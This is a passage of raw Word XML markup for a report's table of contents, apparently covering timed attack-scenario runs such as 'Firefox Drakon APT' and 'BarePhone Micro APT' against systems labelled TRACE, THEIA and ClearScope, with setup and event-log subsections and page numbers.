              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E4DE0E3" w14:textId="6486D6E2" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600048" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600048 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CB913E5" w14:textId="0763D57E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600049" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600049 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="533D1135" w14:textId="32CFBEB9" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600050" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10:08 -- TA1 TRACE 2 -- Firefox Drakon APT Elevate Inject</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600050 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68C9F000" w14:textId="58045424" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600051" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.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051 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2609105C" w14:textId="09B9578A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600052" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.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052 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44C56387" w14:textId="1910EDA8" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600053" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600053 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6387FE2B" w14:textId="3C3DDAAB" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600054" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600054 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="732EA670" w14:textId="32718767" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600055" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11:45 -- TA1 THEIA -- Firefox Drakon APT (Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600055 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FB40954" w14:textId="776FBD86" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600056" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.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056 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18D6B20F" w14:textId="61277A79" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600057" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.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057 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F79BB6B" w14:textId="3CDF5E59" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600058" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600058 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C17ED21" w14:textId="62098482" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600059" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16:09 -- TA1 ClearScope 1 -- BarePhone Micro APT (Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600059 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CF11588" w14:textId="2CBC9D5A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600060" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.5.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060 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07D3D6B4" w14:textId="28763775" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
